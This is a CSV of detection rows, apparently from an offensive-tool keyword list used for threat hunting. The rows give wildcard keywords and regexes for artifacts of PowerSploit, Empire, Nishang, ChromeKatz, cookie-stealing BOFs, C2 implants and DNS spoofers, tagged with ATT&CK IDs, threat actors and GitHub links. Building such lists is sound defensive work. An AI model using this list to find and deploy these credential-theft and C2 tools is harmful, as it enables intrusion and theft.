"*Convert-NT4toCanonical*",".{0,1000}Convert\-NT4toCanonical.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","38817"
"*ConvertTo-LogonHoursArray*",".{0,1000}ConvertTo\-LogonHoursArray.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","38819"
"*ConvertTo-Rc4ByteStream*",".{0,1000}ConvertTo\-Rc4ByteStream.{0,1000}","offensive_tool_keyword","empire","empire function name. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1048","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","38820"
"*ConvertTo-ROT13.ps1*",".{0,1000}ConvertTo\-ROT13\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","38821"
"*ConvertTo-ROT13.ps1*",".{0,1000}ConvertTo\-ROT13\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","38822"
"*ConvertTo-Shellcode -*",".{0,1000}ConvertTo\-Shellcode\s\-.{0,1000}","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1620 - T1055.001 - T1059.004 - T1027 - T1105","TA0005 - TA0004 - TA0002","N/A","N/A","Resource Development","https://github.com/monoxgas/sRDI","1","0","N/A","N/A","N/A","10","2262","473","2023-11-15T10:53:00Z","2017-07-28T19:30:53Z","38823"
"*ConvertToShellcode*",".{0,1000}ConvertToShellcode.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","38824"
"*ConvertTo-Shellcode.*",".{0,1000}ConvertTo\-Shellcode\..{0,1000}","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1620 - T1055.001 - T1059.004 - T1027 - T1105","TA0005 - TA0004 - TA0002","N/A","N/A","Resource Development","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","N/A","10","2262","473","2023-11-15T10:53:00Z","2017-07-28T19:30:53Z","38825"
"*ConvertTo-Shellcode.ps1*",".{0,1000}ConvertTo\-Shellcode\.ps1.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","38826"
"*ConvertToShellcode.py*",".{0,1000}ConvertToShellcode\.py.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","38827"
"*ConvertToShellcode.py*",".{0,1000}ConvertToShellcode\.py.{0,1000}","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1620 - T1055.001 - T1059.004 - T1027 - T1105","TA0005 - TA0004 - TA0002","N/A","N/A","Resource Development","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","N/A","10","2262","473","2023-11-15T10:53:00Z","2017-07-28T19:30:53Z","38828"
"*cookie_graber_x64.o*",".{0,1000}cookie_graber_x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","N/A","10","10","194","23","2024-04-29T19:08:52Z","2023-05-28T18:30:02Z","38829"
"*cookie-graber.c*",".{0,1000}cookie\-graber\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","N/A","10","10","194","23","2024-04-29T19:08:52Z","2023-05-28T18:30:02Z","38830"
"*cookie-graber_x64.exe*",".{0,1000}cookie\-graber_x64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","N/A","10","10","194","23","2024-04-29T19:08:52Z","2023-05-28T18:30:02Z","38831"
"*Cookie-Graber-BOF*",".{0,1000}Cookie\-Graber\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","N/A","10","10","194","23","2024-04-29T19:08:52Z","2023-05-28T18:30:02Z","38832"
"*cookie-katz chrome *",".{0,1000}cookie\-katz\schrome\s.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","38833"
"*cookie-katz chrome *",".{0,1000}cookie\-katz\schrome\s.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","38834"
"*cookie-katz edge *",".{0,1000}cookie\-katz\sedge\s.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","38835"
"*CookieKatz Minidump parser*",".{0,1000}CookieKatz\sMinidump\sparser.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","38836"
"*CookieKatz Minidump parser*",".{0,1000}CookieKatz\sMinidump\sparser.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","38837"
"*cookie-katz webview *",".{0,1000}cookie\-katz\swebview\s.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","38838"
"*CookieKatz.exe*",".{0,1000}CookieKatz\.exe.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","38839"
"*CookieKatzBOF.cpp*",".{0,1000}CookieKatzBOF\.cpp.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","38840"
"*CookieKatzBOF.x64*",".{0,1000}CookieKatzBOF\.x64.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","38841"
"*CookieKatzBOF.zip*",".{0,1000}CookieKatzBOF\.zip.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","38842"
"*CookieKatzMinidump.exe*",".{0,1000}CookieKatzMinidump\.exe.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","38843"
"*CookieProcessor.exe*",".{0,1000}CookieProcessor\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","N/A","10","10","194","23","2024-04-29T19:08:52Z","2023-05-28T18:30:02Z","38844"
"*Cookies stolen and saved successfully!""",".{0,1000}Cookies\sstolen\sand\ssaved\ssuccessfully!\""","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","N/A","N/A","10","","N/A","","","","38845"
"*cooking A replies to point to * matching: *",".{0,1000}cooking\sA\sreplies\sto\spoint\sto\s.{0,1000}\smatching\:\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","38846"
"*cooking AAAA replies to point to * matching: *",".{0,1000}cooking\sAAAA\sreplies\sto\spoint\sto\s.{0,1000}\smatching\:\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","38847"
"*cooking all A replies to point to *",".{0,1000}cooking\sall\sA\sreplies\sto\spoint\sto\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","38848"
"*cooking all AAAA replies to point to *",".{0,1000}cooking\sall\sAAAA\sreplies\sto\spoint\sto\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","38849"
"*cooking all CNAME replies to point to *",".{0,1000}cooking\sall\sCNAME\sreplies\sto\spoint\sto\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","38850"
"*cooking all MX replies to point to *",".{0,1000}cooking\sall\sMX\sreplies\sto\spoint\sto\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","38851"
"*cooking all NS replies to point to *",".{0,1000}cooking\sall\sNS\sreplies\sto\spoint\sto\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","38852"
"*cooking CNAME replies to point to * matching: *",".{0,1000}cooking\sCNAME\sreplies\sto\spoint\sto\s.{0,1000}\smatching\:\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","38853"
"*cooking MX replies to point to * matching: *",".{0,1000}cooking\sMX\sreplies\sto\spoint\sto\s.{0,1000}\smatching\:\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","38854"
"*cooking NS replies to point to * matching: *",".{0,1000}cooking\sNS\sreplies\sto\spoint\sto\s.{0,1000}\smatching\:\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","38855"
"*cool*/cool.zip*",".{0,1000}cool.{0,1000}\/cool\.zip.{0,1000}","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","N/A","10","10","686","112","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z","38856"
"*CoolerVoid/0d1n*",".{0,1000}CoolerVoid\/0d1n.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","38857"
"*coolv0.1.exe*",".{0,1000}coolv0\.1\.exe.{0,1000}","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","N/A","10","10","686","112","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z","38858"
